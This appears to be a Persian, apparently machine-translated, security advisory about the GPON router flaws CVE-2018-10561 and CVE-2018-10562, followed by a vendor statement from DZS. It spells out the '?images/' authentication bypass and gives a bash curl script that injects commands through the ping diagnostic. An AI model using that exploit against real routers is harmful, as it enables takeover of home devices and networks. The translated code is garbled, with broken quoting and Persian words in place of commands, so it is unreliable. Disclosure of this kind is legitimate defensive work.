آسیب پذیری بحرانی RCE در بیش از یک میلیون روتر خانگی GPON یافت شده است


دو به روزرسانی مهم از زمان انتشار این گزارش:

  1. تیم تحقیقاتی ما یک پچ ایجاد کرده است که می تواند به کاربران مؤثر کمک کند. لطفاً اینجا را بررسی کنید
  2. راه حل های DASAN Zhone نظر خود را در مورد این گزارش برای ما ارسال کرد. ما در انتهای این صفحه "آنطور که هست" قرار داده ایم

بررسی اجمالی:

ما یک ارزیابی جامع در مورد تعدادی از روترهای خانگی GPON انجام دادیم. امروزه بسیاری از روترها از اینترنت GPON استفاده می کنند ، و ما راهی برای دور زدن همه تأیید اعتبار در دستگاه ها پیدا کردیم (CVE-2018-10561). با این دور زدن تأیید اعتبار, ما همچنین توانستیم از آسیب پذیری تزریق فرمان دیگری پرده برداریم (CVE-2018-10562) و دستورات مربوط به دستگاه را اجرا کنید.

بهره برداری:

در طول تجزیه و تحلیل ما از بنگاه های تجاری GPON ، دو آسیب پذیری مهم مختلف را پیدا کردیم (CVE-2018-10561) & CVE-2018-10562) که می تواند ، هنگام ترکیب ، امکان کنترل کامل بر روی دستگاه و در نتیجه شبکه را فراهم کند. اولین آسیب پذیری از مکانیزم احراز هویت دستگاهی که دارای نقص است سوء استفاده می کند. این نقص به هر مهاجمی اجازه می دهد تا از تمام احراز هویت عبور کند.

این نقص را می توان با سرورهای HTTP یافت ، که در هنگام احراز هویت ، مسیرهای خاص را بررسی می کنند. این به مهاجم اجازه می دهد تا با استفاده از یک ترفند ساده ، احراز هویت را در هر نقطه انتهایی دور کند.

با افزودن تصاویر؟ به URL ، مهاجم می تواند نقطه پایانی را دور بزند.

این کار در هر دو صفحه HTML و GponForm /

به عنوان مثال ، با درج

/menu.html؟images/
یا
/ GponForm / diag_FORM؟ تصاویر /

ما می توانیم دستگاه را مدیریت کنیم.

در حالی که به دنبال ویژگی های دستگاه می گشتیم ، متوجه شدیم که نقطه پایانی تشخیصی شامل دستورات پینگ و ردیاب است. تشخیص این که فرامین را می توان با پارامتر میزبان تزریق کرد ، زیاد لازم نیست.

از آنجایی که روتر نتایج پینگ را در / tmp ذخیره می کند و هنگام استفاده مجدد کاربر /diag.html ، آن را به کاربر منتقل می کند ، اجرای دستورات و بازیابی خروجی آنها با احراز هویت آسیب پذیری دور زدن ، بسیار ساده است..

نسخه bash کد سوء استفاده را شامل می شود:
#! / bin / bash

echo "[+] ارسال فرمان ..."
# ما دستورات را با دو حالت بک تیک (`) و تک رنگ (؛) ارسال می کنیم زیرا مدل های مختلف در دستگاه های مختلف تحریک می شوند
curl -k -d "XWebPageName = قطر&diag_action = پینگ&wan_conlist = 0&dest_host = \ `$ 2 \`؛ 2 دلار&ipv = 0 ”$ 1 / GponForm / diag_Form؟ تصاویر / 2>/ dev / null 1>/ dev / null
پژواک "[+] منتظر ..."
خواب 3
echo "[+] بازیابی اوپوت ..."
curl -k $ 1 / diag.html؟ images / 2>/ dev / null | grep ‘diag_result =‘ | sed -e ‘s / \\ n / \ n / g"

تأثیر:

GPON نوعی شبکه نوری منفعل است که از فیبر نوری استفاده می کند و از محبوبیت خاصی برخوردار است. هنگامی که افراد از GPON استفاده می کنند ، روترها توسط ISP ها ارائه می شوند. در ویدیو می توانید آن را مشاهده کنید بیش از یک میلیون نفر از این نوع روتر سیستم شبکه استفاده می کنند.

ما این آسیب پذیری را در بسیاری از روترهای GPON تصادفی آزمایش کردیم ، و آسیب پذیری در همه آنها پیدا شد. زیرا افراد زیادی از این نوع روترها استفاده می کنند, این آسیب پذیری می تواند منجر به سازش کل شبکه شود.

توصیه ها:

  1. بررسی کنید که روتر شما از شبکه GPON استفاده می کند یا خیر.
  2. توجه داشته باشید که روترهای GPON می توانند هک شده و مورد سوء استفاده قرار بگیرند.
  3. با ISP خود صحبت کنید تا ببینید که چه کاری می توانند برای رفع اشکال انجام دهند.
  4. به دوستان خود در فیس بوک هشدار دهید (برای اشتراک گذاری اینجا را کلیک کنید) و توییتر (برای توییت اینجا را کلیک کنید).

بروزرسانی: بیانیه DZS در مورد سوء استفاده از بایگانی احراز هویت

DASAN Zhone Solutions ، Inc. گزارش های اخیر رسانه ها را مورد بررسی قرار داده است مبنی بر این که برخی از دستگاه های رابط شبکه DZS GPON (NID) ، که بیشتر به عنوان روتر شناخته می شوند ، می توانند در مقابل یک گذرگاه احراز هویت آسیب پذیر باشند..

DZS مشخص کرده است که سری ZNID-GPON-25xx و برخی از H640series GPON ONT ، هنگام کار بر روی نسخه های نرم افزاری خاص ، تحت تأثیر این آسیب پذیری قرار دارند. تاکنون هیچ تأثیر سرویس از این آسیب پذیری به DZS گزارش نشده است. پس از تحقیقات داخلی ، ما تعیین کرده ایم که تأثیر بالقوه در دامنه محدودتر از گزارش شده توسط vpnMentor است. با توجه به سوابق فروش DZS ، همراه با داده های میدانی جمع آوری شده تا به امروز ، ما تخمین زده ایم که تعداد واحدهای GPON ONT که ممکن است باشد بالقوه کمتر از 240،000 تأثیر پذیر است. علاوه بر این ، با توجه به بلوغ نسبی محصولات در چرخه عمر آنها ، ما فکر می کنیم که تاثیر این دستگاه حتی به دستگاه های کمتری محدود شود.

تاریخچه محصول

DZS ZNID-GPON-25xx و ONT های سری H640 خاص ، از جمله نرم افزاری که این آسیب پذیری را معرفی کرده است ، توسط یک منبع نصب شده نصب شده و توسط DZS فروخته می شود. بیش از 9 سال پیش طراحی و عرضه شد ، بسیاری از این محصولات اکنون از عمر پایدار خدمات خود گذشته اند. از آنجا که دیگر قراردادهای پشتیبانی نرم افزاری برای بیشتر این محصولات ارائه نمی شود ، ما بینش مستقیمی نسبت به تعداد کل واحدهایی که هنوز بطور فعال در این زمینه استفاده می شوند نداریم..

وضوح

DZS به کلیه مشتریانی که این مدل ها را از آسیب پذیری خریداری کرده اند ، آگاه کرده است. ما در حال کار با هر مشتری هستیم تا به آنها در ارزیابی روشها برای رسیدگی به مسئله برای واحدهایی که هنوز هم در این زمینه نصب شده اند کمک کنیم. تصمیم گیری در مورد چگونگی رسیدگی به شرایط تجهیزات مستقر شده در اختیار خود مشتری است.

ماموریت DZS این است که اطمینان حاصل شود که تمام راه حلهای آن با بالاترین استانداردهای امنیتی در صنعت مطابقت دارند. ما از این و هر فرصتی استفاده می کنیم تا طراحی و آزمایش های امنیتی خود را بطور مداوم بررسی و بهبود بخشیم.

Brayan Jackson Administrator
Sorry! The Author has not filled his profile.
follow me